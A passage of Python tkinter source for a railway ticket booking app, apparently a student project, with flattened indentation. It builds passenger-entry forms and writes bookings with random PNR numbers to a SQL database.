Label(window3, text="Have a happy & safe Journey!!",bg='white',fg='orange red',font=('Comic Sans MS', 23,'bold')).place(x=200, y=340)
mainloop()
global count
count=0
if len(enn7.get()) == 0 or len(enn8.get()) == 0 or len(enn9.get()) == 0 or len(e10.get()) == 0:
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif len(e12.get()) != 0 and (len(e13.get()) == 0 or len(e14.get()) == 0 or len(e15.get()) == 0):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif len(e17.get()) != 0 and (len(e18.get()) == 0 or len(e19.get()) == 0 or len(e20.get()) == 0):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif len(e22.get()) != 0 and (len(e23.get()) == 0 or len(e24.get()) == 0 or len(e25.get()) == 0):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif (len(e12.get()) != 0 or len(e13.get()) != 0 or len(e14.get()) != 0 or len(
e15.get()) != 0) and (
len(e22.get()) != 0 or len(e23.get()) != 0 or len(e24.get()) != 0 or len(
e25.get()) != 0) and (
len(e17.get()) == 0 or (len(e18.get()) == 0 or len(e19.get()) == 0 or len(e20.get()) == 0)):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif (len(enn7.get()) != 0 or len(enn8.get()) != 0 or len(enn9.get()) != 0 or len(
e10.get()) != 0) and (
len(e17.get()) != 0 or len(e18.get()) != 0 or len(e19.get()) != 0 or len(
e20.get()) != 0) and (
len(e12.get()) == 0 or (len(e13.get()) == 0 or len(e14.get()) == 0 or len(e15.get()) == 0)):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif enn7.get()!="" and e12.get()=="" and e17.get()=="" and e22.get()=="":
count=1
Show()
elif e12.get()!="" and e17.get()=="":
count=2
Show()
elif e17.get()!="" and e22.get()=="":
count=3
Show()
elif e22.get()!="":
count=4
Show()
else:
Show()
b = Button(window2, text='Proceed', bg="slategray3", font=('Britannic Bold', 16), command=Check1)
b.place(x=450, y=255)
mainloop()
PassengerDetails()
def PassengerDetails2():
global x1
if en15.get()=="12236":
x1=12236
elif en15.get()=="12240":
x1=12240
elif en15.get() == "12244":
x1 = 12244
else:
x1 = 12248
def PassengerDetails():
window1.destroy()
window2 = Toplevel(master)
window2.title("Passenger Details")
window2.config(bg="indianred2")
screen_width = window2.winfo_screenwidth()
screen_height = window2.winfo_screenheight()
width = 1020
height = 700
x = (screen_width / 2) - (width / 2)
y = (screen_height / 2) - (height / 2)
window2.geometry('%dx%d+%d+%d' % (width, height, x, y))
height = 5
width = 5
for i in range(height): # Rows
for j in range(width): # Columns
e1 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
enn2 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
enn3 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
enn4 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
e5 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
e6 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
enn7 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
enn8 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
enn9 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e10 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e11 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e12 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e13 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e14 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e15 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e16 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e17 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e18 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e19 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e20 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e21 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e22 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e23 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e24 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e25 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e1.insert(10, "S.no")
enn2.insert(10, "Name")
enn3.insert(10, "Age")
enn4.insert(10, "Gender")
e5.insert(10, "Id_Proof")
e6.insert(10, "1")
e11.insert(10, "2")
e16.insert(10, "3")
e21.insert(10, "4")
e1.grid(row=0, column=0)
enn2.grid(row=0, column=1)
enn3.grid(row=0, column=2)
enn4.grid(row=0, column=3)
e5.grid(row=0, column=4)
e6.grid(row=1, column=0)
enn7.grid(row=1, column=1)
enn8.grid(row=1, column=2)
enn9.grid(row=1, column=3)
e10.grid(row=1, column=4)
e11.grid(row=2, column=0)
e12.grid(row=2, column=1)
e13.grid(row=2, column=2)
e14.grid(row=2, column=3)
e15.grid(row=2, column=4)
e16.grid(row=3, column=0)
e17.grid(row=3, column=1)
e18.grid(row=3, column=2)
e19.grid(row=3, column=3)
e20.grid(row=3, column=4)
e21.grid(row=4, column=0)
e22.grid(row=4, column=1)
e23.grid(row=4, column=2)
e24.grid(row=4, column=3)
e25.grid(row=4, column=4)
def fun(*args):
enn9.insert(10, v2.get())
def fun1(*args):
e14.insert(10, v3.get())
def fun2(*args):
e19.insert(10, v4.get())
def fun3(*args):
e24.insert(10, v5.get())
def fun4(*args):
e10.insert(10, v6.get())
def fun5(*args):
e15.insert(10, v7.get())
def fun6(*args):
e20.insert(10, v8.get())
def fun7(*args):
e25.insert(10, v9.get())
v2 = StringVar(window2)
gender = {'Male', 'Female'}
v2.set('Choose')
v2.trace("w", fun)
popupMenu1 = OptionMenu(window2, v2, *gender)
popupMenu1.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu1.grid(row=1, column=3)
v3 = StringVar(window2)
gender1 = {'Male', 'Female'}
v3.set('Choose')
v3.trace("w", fun1)
popupMenu2 = OptionMenu(window2, v3, *gender1)
popupMenu2.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu2.grid(row=2, column=3)
v4 = StringVar(window2)
gender2 = {'Male', 'Female'}
v4.set('Choose')
v4.trace("w", fun2)
popupMenu3 = OptionMenu(window2, v4, *gender2)
popupMenu3.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu3.grid(row=3, column=3)
v5 = StringVar(window2)
gender = {'Male', 'Female'}
v5.set('Choose')
v5.trace("w", fun3)
popupMenu4 = OptionMenu(window2, v5, *gender)
popupMenu4.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu4.grid(row=4, column=3)
v6 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v6.set('Choose')
v6.trace("w", fun4)
popup = OptionMenu(window2, v6, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=1, column=4)
v7 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v7.set('Choose')
v7.trace("w", fun5)
popup = OptionMenu(window2, v7, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=2, column=4)
v8 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v8.set('Choose')
v8.trace("w", fun6)
popup = OptionMenu(window2, v8, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=3, column=4)
v9 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v9.set('Choose')
v9.trace("w", fun7)
popup = OptionMenu(window2, v9, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=4, column=4)
def Check1():
def Show():
global x1
window3 = Tk()
window3.title("Ticket")
screen_width = window3.winfo_screenwidth()
screen_height = window3.winfo_screenheight()
width = 780
height = 480
x = (screen_width / 2) - (width / 2)
y = (screen_height / 2) - (height / 2)
window3.geometry('%dx%d+%d+%d' % (width, height, x, y))
window3.config(bg='gray23')
Label(window3, text="Name:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=50)
Label(window3, text="Gender:",bg='dark turquoise',font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=50)
Label(window3, text="Departure time:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=90)
Label(window3, text="Age:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=90)
Label(window3, text="Class:",bg='dark turquoise',font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=130)
Label(window3, text="Train no.:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=130)
Label(window3, text="Train name:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=170)
Label(window3, text="Source:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=210)
Label(window3, text="Destination:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=250)
Label(window3, text="No. of tickets:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=290)
Label(window3, text="PNR no.:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=170)
Name = Label(window3, justify="center",bg='white', font=('Slab Serif', 10)).place(x=170, y=50, height=25)
Gender = Label(window3, justify="center",bg='white', font=('Slab Serif', 10)).place(x=380, y=50, height=25)
DepartureTime = Label(window3, justify="center",bg='white', font=('Slab Serif', 10)).place(x=210, y=90,
height=25)
Age = Label(window3, justify="center",bg='white', font=('Slab Serif', 10)).place(x=380, y=90, height=25)
Class = Label(window3, justify="center",bg='white',text=variable2.get(), font=('Slab Serif', 10)).place(x=380, y=130, height=25)
TrainNumber = Label(window3, justify="center",bg='white', font=('Slab Serif', 10))
TrainNumber.place(x=170, y=130, height=25)
Source = Label(window3, justify="center",bg='white', font=('Slab Serif', 9)).place(x=170, y=170, height=25)
Destination = Label(window3, justify="center",bg='white', font=('Slab Serif', 9)).place(x=180, y=250,
height=25)
Number = Label(window3,text=count, justify="center",bg='white', font=('Slab Serif', 9)).place(x=170, y=290, height=25)
global conn, cursor, x1, x2
if x1 == 12236:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12236")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5], justify="center", font=('Slab Serif', 10)).place(
x=170, y=170, height=25)
Destination = Label(window3, text=data[2], justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1], justify="center",
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3], justify="center",
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3, justify="center",bg='white', text=data[0],
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
elif x1 == 12240:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12240")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=170, height=25)
Destination = Label(window3, text=data[2],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3,bg='white', justify="center", text=data[0],
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
elif x1 == 12244:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12244")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5],bg='white', justify="center", font=('Slab Serif', 10)).place(
x=170, y=170, height=25)
Destination = Label(window3, text=data[2],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3,bg='white', justify="center", text=data[0],
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
elif x1 == 12248:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12248")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5],bg='white', justify="center", font=('Slab Serif', 10)).place(
x=170, y=170,
height=25)
Destination = Label(window3, text=data[2],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3, justify="center",bg='white', text=data[0],
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
Label(window3, text="Have a happy & safe Journey!!",bg='white',fg='orange red',font=('Comic Sans MS', 23,'bold')).place(x=200, y=340)
mainloop()
if len(enn7.get()) == 0 or len(enn8.get()) == 0 or len(enn9.get()) == 0 or len(e10.get()) == 0:
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif len(e12.get()) != 0 and (len(e13.get()) == 0 or len(e14.get()) == 0 or len(e15.get()) == 0):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif len(e17.get()) != 0 and (len(e18.get()) == 0 or len(e19.get()) == 0 or len(e20.get()) == 0):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif len(e22.get()) != 0 and (len(e23.get()) == 0 or len(e24.get()) == 0 or len(e25.get()) == 0):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif (len(e12.get()) != 0 or len(e13.get()) != 0 or len(e14.get()) != 0 or len(
e15.get()) != 0) and (
len(e22.get()) != 0 or len(e23.get()) != 0 or len(e24.get()) != 0 or len(
e25.get()) != 0) and (
len(e17.get()) == 0 or (len(e18.get()) == 0 or len(e19.get()) == 0 or len(e20.get()) == 0)):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif (len(enn7.get()) != 0 or len(enn8.get()) != 0 or len(enn9.get()) != 0 or len(
e10.get()) != 0) and (
len(e17.get()) != 0 or len(e18.get()) != 0 or len(e19.get()) != 0 or len(
e20.get()) != 0) and (
len(e12.get()) == 0 or (len(e13.get()) == 0 or len(e14.get()) == 0 or len(e15.get()) == 0)):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif enn7.get()!="" and e12.get()=="" and e17.get()=="" and e22.get()=="":
count=1
Show()
elif e12.get()!="" and e17.get()=="":
count=2
Show()
elif e17.get()!="" and e22.get()=="":
count=3
Show()
elif e22.get()!="":
count=4
Show()
else:
Show()
b = Button(window2, text='Proceed', bg="slategray3", font=('Britannic Bold', 16), command=Check1)
b.place(x=450, y=255)
mainloop()
PassengerDetails()
def PassengerDetails3():
global x1
if en22.get() == "12237":
x1 = 12237
elif en22.get() == "12241":
x1 = 12241
elif en22.get() == "12245":
x1 = 12245
else:
x1 = 12249
def PassengerDetails():
window1.destroy()
window2 = Toplevel(master)
window2.title("Passenger Details")
window2.config(bg="indianred2")
screen_width = window2.winfo_screenwidth()
screen_height = window2.winfo_screenheight()
width = 1020
height = 700
x = (screen_width / 2) - (width / 2)
y = (screen_height / 2) - (height / 2)
window2.geometry('%dx%d+%d+%d' % (width, height, x, y))
height = 5
width = 5
for i in range(height): # Rows
for j in range(width): # Columns
e1 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
enn2 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
enn3 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
enn4 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
e5 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
e6 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
enn7 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
enn8 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
enn9 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e10 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e11 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e12 = Entry(window2, justify="center",font=('Rockwell Condensed', 11), bg="steelblue3")
e13 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e14 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e15 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e16 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e17 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e18 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e19 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e20 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e21 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e22 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e23 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e24 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e25 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e1.insert(10, "S.no")
enn2.insert(10, "Name")
enn3.insert(10, "Age")
enn4.insert(10, "Gender")
e5.insert(10, "Id_Proof")
e6.insert(10, "1")
e11.insert(10, "2")
e16.insert(10, "3")
e21.insert(10, "4")
e1.grid(row=0, column=0)
enn2.grid(row=0, column=1)
enn3.grid(row=0, column=2)
enn4.grid(row=0, column=3)
e5.grid(row=0, column=4)
e6.grid(row=1, column=0)
enn7.grid(row=1, column=1)
enn8.grid(row=1, column=2)
enn9.grid(row=1, column=3)
e10.grid(row=1, column=4)
e11.grid(row=2, column=0)
e12.grid(row=2, column=1)
e13.grid(row=2, column=2)
e14.grid(row=2, column=3)
e15.grid(row=2, column=4)
e16.grid(row=3, column=0)
e17.grid(row=3, column=1)
e18.grid(row=3, column=2)
e19.grid(row=3, column=3)
e20.grid(row=3, column=4)
e21.grid(row=4, column=0)
e22.grid(row=4, column=1)
e23.grid(row=4, column=2)
e24.grid(row=4, column=3)
e25.grid(row=4, column=4)
def fun(*args):
enn9.insert(10, v2.get())
def fun1(*args):
e14.insert(10, v3.get())
def fun2(*args):
e19.insert(10, v4.get())
def fun3(*args):
e24.insert(10, v5.get())
def fun4(*args):
e10.insert(10, v6.get())
def fun5(*args):
e15.insert(10, v7.get())
def fun6(*args):
e20.insert(10, v8.get())
def fun7(*args):
e25.insert(10, v9.get())
v2 = StringVar(window2)
gender = {'Male', 'Female'}
v2.set('Choose')
v2.trace("w", fun)
popupMenu1 = OptionMenu(window2, v2, *gender)
popupMenu1.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu1.grid(row=1, column=3)
v3 = StringVar(window2)
gender1 = {'Male', 'Female'}
v3.set('Choose')
v3.trace("w", fun1)
popupMenu2 = OptionMenu(window2, v3, *gender1)
popupMenu2.config(font=('Calisto MT', 9), bg="darkgoldenrod3", fg='white')
popupMenu2.grid(row=2, column=3)
v4 = StringVar(window2)
gender2 = {'Male', 'Female'}
v4.set('Choose')
v4.trace("w", fun2)
popupMenu3 = OptionMenu(window2, v4, *gender2)
popupMenu3.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu3.grid(row=3, column=3)
v5 = StringVar(window2)
gender = {'Male', 'Female'}
v5.set('Choose')
v5.trace("w", fun3)
popupMenu4 = OptionMenu(window2, v5, *gender)
popupMenu4.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu4.grid(row=4, column=3)
v6 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v6.set('Choose')
v6.trace("w", fun4)
popup = OptionMenu(window2, v6, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=1, column=4)
v7 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v7.set('Choose')
v7.trace("w", fun5)
popup = OptionMenu(window2, v7, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=2, column=4)
v8 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v8.set('Choose')
v8.trace("w", fun6)
popup = OptionMenu(window2, v8, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=3, column=4)
v9 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v9.set('Choose')
v9.trace("w", fun7)
popup = OptionMenu(window2, v9, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=4, column=4)
def Check1():
def Show():
global x1
window3 = Tk()
window3.title("Ticket")
screen_width = window3.winfo_screenwidth()
screen_height = window3.winfo_screenheight()
width = 780
height = 480
x = (screen_width / 2) - (width / 2)
y = (screen_height / 2) - (height / 2)
window3.geometry('%dx%d+%d+%d' % (width, height, x, y))
window3.config(bg='gray23')
Label(window3, text="Name:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=50)
Label(window3, text="Gender:", bg='dark turquoise',font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=50)
Label(window3, text="Departure time:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=90)
Label(window3, text="Age:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=90)
Label(window3, text="Class:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=130)
Label(window3, text="Train no.:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=130)
Label(window3, text="Train name:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=170)
Label(window3, text="Source:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=210)
Label(window3, text="Destination:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=250)
Label(window3, text="No. of tickets:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=290)
Label(window3, text="PNR no.:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=170)
Name = Label(window3, justify="center",bg='white', font=('Slab Serif', 10)).place(x=170, y=50, height=25)
Gender = Label(window3, justify="center",bg='white', font=('Slab Serif', 10)).place(x=380, y=50, height=25)
DepartureTime = Label(window3, justify="center",bg='white', font=('Slab Serif', 10)).place(x=210, y=90,
height=25)
Age = Label(window3, justify="center",bg='white',font=('Slab Serif', 10)).place(x=380, y=90, height=25)
Class = Label(window3, justify="center",bg='white',text=variable2.get(),font=('Slab Serif', 10)).place(x=380, y=130, height=25)
TrainNumber = Label(window3, justify="center",bg='white', font=('Slab Serif', 10))
TrainNumber.place(x=170, y=130, height=25)
Source = Label(window3, justify="center",bg='white', font=('Slab Serif', 9)).place(x=170, y=170, height=25)
Destination = Label(window3, justify="center",bg='white', font=('Slab Serif', 9)).place(x=180, y=250,
height=25)
Number = Label(window3,text=count, justify="center", bg='white',font=('Slab Serif', 9)).place(x=170, y=290, height=25)
global conn, cursor, x1, x2
if x1 == 12237:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12237")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5],bg='white', justify="center", font=('Slab Serif', 10)).place(
x=170, y=170, height=25)
Destination = Label(window3, text=data[2],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3, justify="center", text=data[0],bg='white',
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
elif x1 == 12241:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12241")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=170, height=25)
Destination = Label(window3, text=data[2],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3, justify="center", text=data[0],bg='white',
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
elif x1 == 12245:
cursor = conn.cursor()
TrainNumber.config(text=x1)
